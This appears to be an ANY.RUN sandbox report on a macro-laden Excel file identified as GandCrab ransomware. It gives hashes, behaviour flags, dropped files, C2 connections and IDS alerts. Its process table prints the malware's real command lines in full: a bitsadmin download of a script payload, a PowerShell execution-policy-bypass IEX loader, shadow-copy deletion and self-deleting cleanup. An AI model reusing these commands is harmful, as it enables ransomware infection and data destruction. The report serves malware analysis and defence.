analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

SOC test.xlsm

Full analysis: https://app.any.run/tasks/025eaa6b-a45e-4499-b5aa-fdc2eaa2ef64
Verdict: Malicious activity
Threats:

GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost.

Analysis date: January 10, 2019, 19:53:36
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
loader
ransomware
gandcrab
trojan
Indicators:
MIME: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
File info: Microsoft Excel 2007+
MD5:

977924EF58A2EDDA76A9BA8C30CFB07D

SHA1:

E172616D1DF9B762E9DD7C3F357E3071EBC3A11B

SHA256:

88C6B4EF5C42BB66CEBF8825D693B58EF78F9C9FEEF7CD884EEF823C78F0639A

SSDEEP:

768:NrIjaPdlcZnH938rL40tUYwJgsb19nQFX4aqnRUPegn:V/PdeZdKLttigw9nQFX2UPegn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Deletes shadow copies

      • powershell.exe (PID: 3596)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2972)
    • Uses BITADMIN.EXE for downloading application

      • EXCEL.EXE (PID: 2972)
    • Dropped file may contain instructions of ransomware

      • powershell.exe (PID: 3596)
    • GandCrab keys found

      • powershell.exe (PID: 3596)
    • Executes scripts

      • EXCEL.EXE (PID: 2972)
    • Writes file to Word startup folder

      • powershell.exe (PID: 3596)
    • Actions looks like stealing of personal data

      • powershell.exe (PID: 3596)
    • Renames files like Ransomware

      • powershell.exe (PID: 3596)
    • Connects to CnC server

      • powershell.exe (PID: 3596)
  • SUSPICIOUS

    • Creates files like Ransomware instruction

      • powershell.exe (PID: 3596)
    • Reads the cookies of Mozilla Firefox

      • powershell.exe (PID: 3596)
    • Executes PowerShell scripts

      • WScript.exe (PID: 3328)
    • Creates files in the user directory

      • WScript.exe (PID: 3328)
      • powershell.exe (PID: 3596)
    • Reads Internet Cache Settings

      • powershell.exe (PID: 3596)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 3596)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2972)
    • Reads settings of System Certificates

      • powershell.exe (PID: 3596)
    • Dropped object may contain TOR URL's

      • powershell.exe (PID: 3596)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xlsm | Excel Microsoft Office Open XML Format document (with Macro) (50.8)
.xlsx | Excel Microsoft Office Open XML Format document (30)
.zip | Open Packaging Conventions container (15.4)
.zip | ZIP compressed archive (3.5)

EXIF

XML

AppVersion: 15.03
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
Company: -
TitlesOfParts: Sheet1
HeadingPairs:
  • Hojas de cálculo
  • 1
ScaleCrop: No
DocSecurity: None
Application: Microsoft Excel
ModifyDate: 2019:01:10 19:53:09Z
CreateDate: 2006:09:16 00:00:00Z
LastModifiedBy: -

XMP

Creator: -

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1257
ZipCompressedSize: 395
ZipCRC: 0xf3ea132d
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
46
Monitored processes
7
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe no specs bitsadmin.exe no specs wscript.exe no specs #GANDCRAB powershell.exe wmic.exe no specs cmd.exe no specs timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2972"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3344"C:\Windows\System32\bitsadmin.exe" /transfer myFile /download /priority normal https://download1591.mediafire.com/50dbuyji2mvg/lqn7rd8dez3cvmc/obfuscated.tmp C:\Users\admin\AppData\Local\Temp\\pepe.jsC:\Windows\System32\bitsadmin.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
3328"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\pepe.js" C:\Windows\System32\WScript.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3596"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "IEX (([System.IO.File]::ReadAllText('C:\Users\admin\AppData\Roaming\tnqalxuybs.log')).Replace('?',''));"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2884"C:\Windows\system32\wbem\wmic.exe" shadowcopy deleteC:\Windows\system32\wbem\wmic.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
2147749908
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3960"C:\Windows\System32\cmd.exe" /c timeout -c 5 & del "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /f /qC:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3472timeout -c 5 C:\Windows\system32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 111
Read events
985
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
289
Text files
237
Unknown types
7

Dropped files

PID
Process
Filename
Type
2972EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRE9E7.tmp.cvr
MD5:
SHA256:
3596powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GNG9J65Z8PAWSWTU9UT7.temp
MD5:
SHA256:
2972EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74A5884.png
MD5:
SHA256:
2972EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~$SOC test.xlsm
MD5:
SHA256:
2972EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFAFA7DC591278B768.TMP
MD5:
SHA256:
3596powershell.exeC:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp
MD5:
SHA256:
3596powershell.exeC:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData
MD5:
SHA256:
3596powershell.exeC:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings
MD5:
SHA256:
3596powershell.exeC:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata
MD5:
SHA256:
3596powershell.exeC:\Users\admin\AppData\Roaming\Adobe\Acrobat\CTBXEZEHC-DECRYPT.txttext
MD5:AFB0A586264EEB8E4A3554BFA6DF3649
SHA256:559098C7EB660E8AF2D20030CBC1BE7E4CCC86C142E0F688A6079688F8DA0AF6
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
138
TCP/UDP connections
265
DNS requests
111
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3596
powershell.exe
GET
212.59.186.61:80
http://www.hotelweisshorn.com/
CH
malicious
3596
powershell.exe
GET
302
192.185.159.253:80
http://www.pizcam.com/
US
malicious
3596
powershell.exe
GET
301
83.138.82.107:80
http://www.swisswellness.com/
DE
whitelisted
3596
powershell.exe
GET
78.46.77.98:80
http://www.2mmotorsport.biz/
DE
suspicious
3596
powershell.exe
GET
301
83.166.138.7:80
http://www.whitepod.com/
CH
whitelisted
3596
powershell.exe
POST
217.26.53.161:80
http://www.haargenau.biz/content/assets/sehemeka.png
CH
malicious
3596
powershell.exe
GET
301
104.24.23.22:80
http://www.belvedere-locarno.com/
US
shared
3596
powershell.exe
GET
301
80.244.187.247:80
http://www.hotelfarinet.com/
GB
suspicious
3596
powershell.exe
GET
217.26.53.37:80
http://www.hrk-ramoz.com/
CH
malicious
3596
powershell.exe
GET
69.16.175.10:80
http://www.hardrockhoteldavos.com/
US
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3596
powershell.exe
78.46.77.98:443
www.2mmotorsport.biz
Hetzner Online GmbH
DE
suspicious
3596
powershell.exe
136.243.13.215:80
www.holzbock.biz
Hetzner Online GmbH
DE
suspicious
3596
powershell.exe
74.220.215.73:80
www.bizziniinfissi.com
Unified Layer
US
malicious
199.91.152.91:443
download1591.mediafire.com
MediaFire, LLC
US
malicious
3596
powershell.exe
138.201.162.99:80
www.fliptray.biz
Hetzner Online GmbH
DE
malicious
3596
powershell.exe
78.46.77.98:80
www.2mmotorsport.biz
Hetzner Online GmbH
DE
suspicious
3596
powershell.exe
217.26.53.161:80
www.haargenau.biz
Hostpoint AG
CH
malicious
3596
powershell.exe
138.201.162.99:443
www.fliptray.biz
Hetzner Online GmbH
DE
malicious
3596
powershell.exe
83.138.82.107:80
www.swisswellness.com
hostNET Medien GmbH
DE
suspicious
3596
powershell.exe
83.138.82.107:443
www.swisswellness.com
hostNET Medien GmbH
DE
suspicious

DNS requests

Domain
IP
Reputation
download1591.mediafire.com
  • 199.91.152.91
malicious
www.2mmotorsport.biz
  • 78.46.77.98
unknown
www.haargenau.biz
  • 217.26.53.161
unknown
www.bizziniinfissi.com
  • 74.220.215.73
malicious
www.holzbock.biz
  • 136.243.13.215
unknown
www.fliptray.biz
  • 138.201.162.99
malicious
www.pizcam.com
  • 192.185.159.253
unknown
www.swisswellness.com
  • 83.138.82.107
whitelisted
www.hotelweisshorn.com
  • 212.59.186.61
unknown
www.whitepod.com
  • 83.166.138.7
whitelisted

Threats

PID
Process
Class
Message
3596
powershell.exe
A Network Trojan was detected
ET TROJAN [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity
3596
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
3596
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] GandCrab Ransomware HTTP
3596
powershell.exe
A Network Trojan was detected
ET POLICY Data POST to an image file (gif)
3596
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
3596
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] GandCrab Ransomware HTTP
3596
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
3596
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] GandCrab Ransomware HTTP
3596
powershell.exe
A Network Trojan was detected
ET POLICY Data POST to an image file (gif)
3596
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
No debug info